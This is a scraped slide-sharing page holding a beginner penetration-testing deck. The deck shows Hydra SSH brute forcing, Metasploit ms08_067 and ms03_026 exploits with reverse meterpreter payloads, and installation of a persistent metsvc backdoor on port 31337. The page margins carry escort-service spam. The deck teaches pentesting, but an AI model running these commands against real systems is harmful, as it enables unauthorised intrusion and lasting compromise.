Software Engineering Methodologies (overview)eniolaolutunde
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfAyushMahapatra5
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpinRaunakKeshri1
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhikauryashika82
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...PsychoTech Services
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingTeacherCyreneCayanan
 

Recently uploaded (20)

Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpin
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writing
 

Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates

  • 1. BLACKBOX PENTESTING Conducting a Penetration Test on an Organization This document is decided to give readers an outlook on how a penetration test can be successfully done on an organization. A methodology has been drawn out in this document to allow readers to be acquainted with the process that penetration testers go through to conduct a penetration test.
  • 2. What is a Penetration Test? Penetration tests are a great way to identify vulnerabilities that exists in a system or network that has an existing security measures in place. A penetration test usually involves the use of attacking methods conducted by trusted individual that are similarly used by hostile intruders or hackers. Depending on the type of test that is conducted, this may involve a simple scan of an IP addresses to identify machines that are offering services with known vulnerabilities or even exploiting known vulnerabilities that exists in an unpatched operating system. The results of these tests or attacks are then documented and presented as report to the owner of the system and the vulnerabilities identified can then be resolved. Bear in mind that a penetration test does not last forever. Depending on the organization conducting the tests, the time frame to conduct each test varies. A penetration test is basically an attempt to breach the security of a network or system and is not a full security audit. This means that it is no more than a view of a system’s security at a single moment in time. At this time, the known vulnerabilities, weaknesses or misconfigured systems have not changed within the time frame the penetration test is conducted. Information gathering and analysis After doing the necessary planning and preparation with the organization (or target) the next step is to gather as much information as possible about the targeted systems or networks. There’s a wealth of tools and online resources available for us to do the necessary information gathering. If the intended target has an online website, this is a good place to start your information gathering. We should always remember that any kind of information gathered during this stage may prove useful to us in the other stages of the penetration test. Information is power. A very good online resource is available at http://www.netcraft.com. The people at Netcraft have developed a service that has made our information gathering quite simple. Their service examines a network connected to the Internet and reports back which hosts are visible
  • 3. Black Box Pentest Pattern Notice: You must be connect to the internet to perform black box Tools For Immediate Usage: 1) NMAP 2) Putty 3) Wireshark 4) Hydra 5) Backtrack
  • 4. NMAP: scan the ports of the IP Address associated with the network and the internet by getting the port result perform the attack on the relevant port, for example port 22,23 use hydra for immediate telnet or SSH attack. Putty: By getting the username and password from hydra put these information in Putty in order to gain access in the network. Wireshark: Sniff the network packet and trace whether the route is correct or not Backtrack: use msfconsole for attack analysis for example RPC attack, Oracle attack. Netbios: use NETBIOS attack simulation Get advance Who is: Perform advance who is attack on the web to get the information of DNS server and domain msfconsole Working A very useful tool to conduct a network survey is Nmap. Nmap is a tool made for scanning large networks. We could also use Nmap to determine what operating systems are running on a network as well as the type of packet filters/firewalls are in use, and numerous other characteristics.
  • 5. There are tools available that can automate vulnerability detection. Such a tool is Nessus (http://www.nessus.org). Nessus is a security scanner that audit remotely a given network and determine whether vulnerabilities exists in it. It produces a list of vulnerabilities that exist in a network as well as steps that should be taken to address these vulnerabilities. A screen shot is shown below:
  • 6. Figure The completion of the vulnerability detection will produce a definite list of targets to investigate in depth. These lists of targets will be used in the next stage. A penetration will be attempted at these targets that have their vulnerabilities defined. Penetration Attempt after determining the vulnerabilities exist in the system, the next stage is to identify suitable targets for a penetration attempt. The time and effort that need to put in for the systems that have vulnerabilities need to be estimated accordingly. Estimations on how long a penetration test takes on a particular system are important at this point. The target chosen to perform the penetration attempt is also important. One practice that most organizations do is to name their machines in a way that they understand what the machine does. The computer name of the target is sometimes a decisive factor for choosing targets. Often after a network survey you would find computer names like SourceCode_PC, Int_Surfing and others that give penetration testers an idea of what the machine does. By choosing their target properly, penetration testers will not waste time and effort doing any redundant job. Normally penetration tests have a certain constraint and penetration tester should not waste any time unnecessarily. There are other ways to choose a target. The above just demonstrates some criteria used.
  • 7. Password cracking has become a normal practice in penetration tests. In most cases, you’ll find services that are running on systems like telnet and ftp. This is a good place to start and use our password cracking methods to penetrate these systems. The list below shows just some of the password cracking methods used: - Dictionary Attack – Uses a word list or dictionary file. Hybrid Crack - Tests for passwords that are variations of the words in a dictionary file. Brute Force - Tests for passwords that are made up of characters going through all the combinations possible. Performing SSH, TELNET, NETBIOS, AAA Attack root@root:~ hydra -l ubaid -P password.txt 192.168.1.3 ssh root@root:~ cd /pentest/exploits/fasttrack root@root:/pentest/exploits/fasttrack# ./fasttrack.py -i
  • 8. Select option Number 5: Mass client-Side Attack
  • 9. Press Enter This is automatically check each and every payload one by one FOR NETBIOS ATTACK Open your backtrack Terminal and type nmap –sV 192.168.1.56 The results above are showing that the port 445 is open so we will try to use the netapi exploit. The microsoft-ds are a very common service in Windows machines. Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445. Open backtrack terminal and type msfconsole
  • 10. Now Type “Search “netapi “command in the console, this command will search for the entire exploit modules with the pattern”netapi“ Now type use exploit/windows/smb/ms08_067_netapi Msf exploit (ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms08_067_netapi)>set lhost 192.168.1.2 (IP of Local Host) Msf exploit (ms08_067_netapi)>set rhost 192.168.1.56 (IP of Local Host) Msf exploit (ms08_067_netapi)>exploit Now you can get access of victim pc
  • 11. Now type metsvc –A This command will upload some files and it will create a windows service on the remote machine The backdoor will run on port 31337 Now we will reboot the system. Now Open backtrack terminal type msfconsole use exploit/multi/handler set payload windows/metsvc_bind_tcp set rhost 192.168.1.56 (IP of Victim PC) set lport 31337 exploit
  • 12. MSRPC Attack Analysis (Port 135) Description: Remote Procedure call uses 135 port and use for doing telnet and remote request over the ethernet Exploit: Root@Root:~ msfconsole msf > use windows/dcerpc/ms03_026_dcom msf exploit (ms03_026_dcom) > show options RHOST Required RPORT Not Required msf exploit (ms03_026_dcom) > set RHOST 200.100.100.10 msf exploit (ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit (ms03_026_dcom) > exploit RDP(Remote Desktop Procedure) (Port 139,445) Description: Server Message block Identification: nmap -v 192.168.1.2 Discovering open port 139 Discovering open port 445
  • 13. Exploit: msf > use exploit/windows/smb/ms08_067_netapi msf exploit (ms08_067_netapi) > show options RHOST Required RPORT Not Required msf exploit(ms08_067_netapi) > set RHOST 200.100.100.10 msf exploit (ms08_067_netapi) > exploit Result of Remote Machine